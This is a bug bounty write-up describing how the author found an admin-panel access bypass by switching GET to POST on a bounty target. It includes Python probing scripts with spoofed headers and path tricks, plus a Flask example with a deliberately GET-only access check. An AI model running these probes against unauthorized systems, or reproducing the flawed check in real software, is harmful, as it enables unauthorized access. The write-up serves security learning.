
My First Bug Bounty - How I Earned $1,000 With One Simple Step

Kailasv

Oct 2, 2025


This blog was originally published here by Kailasv


Bug bounty hunting had been on my radar for a while. After reading dozens of write-ups and diving into HackerOne’s documentation, I finally decided to go hands-on. This is the story of how I discovered a subtle yet impactful vulnerability that led to my first $1,000 bounty, and the lessons I learned along the way.


Laying the Groundwork

Like most people stepping into this space, I started with the essentials: reading success stories, understanding common vulnerabilities, and exploring the HackerOne platform. I took time to understand how experienced researchers approached targets and documented their findings.


Once I felt confident with the fundamentals, I picked a public program on HackerOne — let’s call it TargetApp — that I found interesting and mature. It was well-tested, so I knew it wouldn’t be easy, but I also saw it as a chance to learn how hardened applications behave under scrutiny.

• • •

Early Exploration and the Quiet Phase

I began with basic reconnaissance:

  • Inspecting the site manually
  • Reviewing robots.txt for hidden paths
  • Testing common vulnerabilities like XSS, open redirects, and IDORs
  • Using Burp Suite to analyze requests and responses

I experimented with various endpoints, looked at how input was handled, and observed the app’s behavior closely.
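
For a concrete sense of that first pass, here is a minimal Python sketch of what it can look like in script form, alongside the manual work in Burp. The host targetapp.example and the path list are placeholders for illustration, not the program's real details.

    import requests

    BASE = "https://targetapp.example"   # placeholder host, not the real program
    paths = ["/", "/robots.txt", "/login", "/signup", "/api/"]

    for path in paths:
        resp = requests.get(BASE + path, timeout=10, allow_redirects=False)
        # Note the status code plus a couple of headers worth a second look
        print(path, resp.status_code,
              resp.headers.get("Server"), resp.headers.get("Location"))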


For nearly two months, I found nothing significant. The application had strong protections in place and had clearly been through multiple rounds of security assessments. It was quiet on the bug front. Man, I was frustrated, but I stayed consistent.

The Breakthrough: Re-reading robots.txt

One day, while revisiting earlier notes, I decided to check robots.txt again. I’d reviewed it before, but this time I slowed down and gave it a closer look. Among the disallowed paths, one stood out.

Disallow: /admin/

It’s not unusual for sensitive routes to appear in robots.txt, but this caught my attention. There wasn’t anything directly exploitable here, but it was a clue. I decided to explore it further.
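
For readers following along, a re-read like this can also be scripted. The tiny sketch below (same placeholder host) lists every Disallow entry so nothing gets skimmed past:

    import requests

    BASE = "https://targetapp.example"   # placeholder host

    robots = requests.get(BASE + "/robots.txt", timeout=10).text
    for line in robots.splitlines():
        line = line.strip()
        # robots.txt directives are case-insensitive, so normalize before matching
        if line.lower().startswith("disallow:"):
            print("Disallowed path worth a look:", line.split(":", 1)[1].strip())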

I intercepted a request to /admin/ in Burp Suite and forwarded it. The server returned:

403 Forbidden

A forbidden response — meaning the resource existed, but access was blocked.

That was promising.
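
A quick sanity check at this point, sketched below with the same placeholder host, is to compare the gated path against one that certainly does not exist. A 403 on /admin/ next to a 404 on a junk path supports the read that the admin route is real and merely access-controlled.

    import requests

    BASE = "https://targetapp.example"   # placeholder host

    for path in ["/admin/", "/this-path-should-not-exist/"]:
        status = requests.get(BASE + path, timeout=10).status_code
        print(path, "->", status)
    # Expected pattern: 403 for /admin/ (exists, blocked) vs 404 for the junk path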

• • •

Trying Bypass Techniques

At this point, I explored different 403 bypass techniques. My checklist included the following (a short sketch of these probes follows the list):

  • Modifying headers like X-Original-Method, X-Forwarded-For, Referer
  • Trying path variations (/admin/., /admin/%2e/)
  • Using different user agents
  • Switching HTTP methods
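
For reference, the first few checklist items can be scripted roughly as below. The header names come straight from the checklist; the values, host, and everything else are illustrative, and in practice Burp's Repeater gives finer control over the raw request.

    import requests

    BASE = "https://targetapp.example"   # placeholder host
    TARGET = "/admin/"

    # Header-based attempts (header names from the checklist; values are illustrative)
    header_tricks = [
        {"X-Original-Method": "GET"},
        {"X-Forwarded-For": "127.0.0.1"},
        {"Referer": BASE + "/"},
        {"User-Agent": "Mozilla/5.0 (compatible; ExampleBot/1.0)"},
    ]
    for extra in header_tricks:
        status = requests.get(BASE + TARGET, headers=extra, timeout=10).status_code
        print("header", extra, "->", status)

    # Path-variation attempts; encoded variants such as /admin/%2e/ are easier to
    # send from Burp Repeater, since high-level clients may normalize the encoding
    for variant in ["/admin/."]:
        status = requests.get(BASE + variant, timeout=10).status_code
        print("path", variant, "->", status)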

That last one — changing the request method — is what made the difference.


I modified the intercepted GET request to /admin/ and changed the method to POST. Then I forwarded it.


To my surprise, the response was:

200 OK

The forbidden page was now accessible.

Expanding the Discovery

I applied the same method to other admin-related routes:

  • /admin/users

Every endpoint that previously returned 403 Forbidden to GET requests responded successfully when accessed via POST.


At this point, I didn’t try to interact with the functionality or escalate further. I had demonstrated access to authenticated or protected areas through a method bypass, and that was enough to report.
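
In script form, the whole finding boils down to a comparison like the one below. Only /admin/ and /admin/users appear in the list because those are the routes named above; anything further would be appended as it is discovered, and the host remains a placeholder.

    import requests

    BASE = "https://targetapp.example"   # placeholder host
    routes = ["/admin/", "/admin/users"]  # extend as further routes are discovered

    for route in routes:
        get_status = requests.get(BASE + route, timeout=10).status_code
        # Same request with an empty POST body; the only variable is the method
        post_status = requests.post(BASE + route, data={}, timeout=10).status_code
        flag = "method bypass!" if (get_status == 403 and post_status == 200) else ""
        print(route, "GET", get_status, "POST", post_status, flag)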


Submitting the Report

I submitted a clear and concise report via HackerOne, including:

  • A summary of the issue
  • Affected endpoints
  • Steps to reproduce using Burp Suite
  • Screenshots and proof-of-concept requests
  • A note on the potential impact

Within a few days, the triage team acknowledged the report. Not long after, it was resolved, and the bounty notification came through: $1,000 awarded.

Lessons Learned

Here are some key takeaways from this experience:

  1. Revisit and Reobserve. Things you've already looked at can hold value when approached with a fresh mindset. robots.txt didn't seem useful at first, but it ended up being the breadcrumb that led to the discovery.

  2. Understand How Servers Handle Methods. The difference in how GET and POST are handled across routes can expose logic flaws or access control issues. Knowing when to try alternative methods is a key part of a bypass strategy; a short server-side sketch after this list shows how that kind of gap can creep in.

  3. Manual Testing Beats Automation for Logic Flaws. Automated tools didn't catch this. It took manual attention, creative thinking, and strategic probing.

  4. Consistency Pays Off. Bug bounty success isn't usually instant. This took time, patience, and repeated effort, but the reward was well worth it.
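
To make the second takeaway concrete, here is a small, self-contained Flask sketch of how this class of flaw can arise on the server side. It is not TargetApp's actual code, just one plausible way an access check ends up guarding only GET requests.

    from flask import Flask, abort, request

    app = Flask(__name__)

    def require_admin():
        # Stand-in for a real session or role check; always denies in this demo
        abort(403)

    # The route accepts both methods, but the guard only runs for GET,
    # so a POST to /admin/ skips the check entirely and reaches the handler body.
    @app.route("/admin/", methods=["GET", "POST"])
    def admin_panel():
        if request.method == "GET":
            require_admin()          # GET -> 403 Forbidden
        return "admin panel", 200    # POST -> 200 OK

    if __name__ == "__main__":
        app.run()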


Final Thoughts

This wasn’t just a $1,000 bounty — it was a validation that I was on the right track. The process of exploration, failure, and eventually success gave me a deeper appreciation for how web applications are secured — and how they can still be vulnerable in subtle ways.
